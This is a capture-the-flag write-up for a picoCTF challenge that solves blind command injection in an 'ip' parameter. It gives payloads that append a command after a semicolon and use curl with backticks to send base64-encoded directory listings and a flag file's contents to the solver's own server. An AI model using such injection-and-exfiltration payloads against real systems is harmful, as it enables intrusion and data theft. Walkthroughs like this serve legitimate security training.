Tags: rce
Rating:
## Code review
Mentioned in the tips , I found backend is not safe.
## analyse
We use hackbar to post ip,like this:
`ip=1.1.1.1;some command`
challenge server will execute the command,but we can't know whether it has been executed. Because there is no output.
Now you need your server and its IP. We call IP to instead of your server's ip in this writeup.
We use `curl` to let the challenge server visit our server.
You may try this:
```
ip=1.1.1.1;curl http://IP/`ls`
```
``ls`` means challenge server execute ls and take it as the request's parameter to visit your server
Check your server's access.log which is located in `/var/log/apache2/` of your server.Your will see the HTTP request from challenge server.
`"GET /index.php HTTP/1.1" 200 533 "-" "curl/7.47.0"`
That's mean after `ls` we get `index.php`
Ohhhh,we found the file of challenge server, but why there is only 1 file?
Your can try the command on your pc.Your will find on this way,we only get 1st file of current path.
That is not enough! We need more file!
So,let's try
```
ip=1.1.1.1;curl http://IP/`ls|base64`
```
We got:
`"GET /aW5kZXgucGhwCmluZGV4LnR4dAp0aGUtc2VjcmV0LTE1NTUtZmxhZy50eHQKeGluZXRfc3RhcnR1 HTTP/1.1" 404 515 "-" "curl/7.47.0"`
So,the `aW5kZXgucGhwCmluZGV4LnR4dAp0aGUtc2VjcmV0LTE1NTUtZmxhZy50eHQKeGluZXRfc3RhcnR1`is the answer of `ls`
After decoding it,we get :
index.php
index.txt
the-secret-1555-flag.txt
xinet_startu
Using the same method,we can cat the .txt
```
ip=1.1.1.1;curl http://IP/`cat the-secret-1555-flag.txt|base64`
```
Got:
`"GET /SGVyZSBpcyB5b3VyIGZsYWc6IHBpY29DVEZ7bjN2M3JfdHJ1c3RfYV9iMHhfOTY2MzlkOTF9Cgo= HTTP/1.1" 404 515 "-" "curl/7.47.0"`
base64decode`SGVyZSBpcyB5b3VyIGZsYWc6IHBpY29DVEZ7bjN2M3JfdHJ1c3RfYV9iMHhfOTY2MzlkOTF9Cgo=`
we get flag:
`Here is your flag: picoCTF{n3v3r_trust_a_b0x_96639d91}`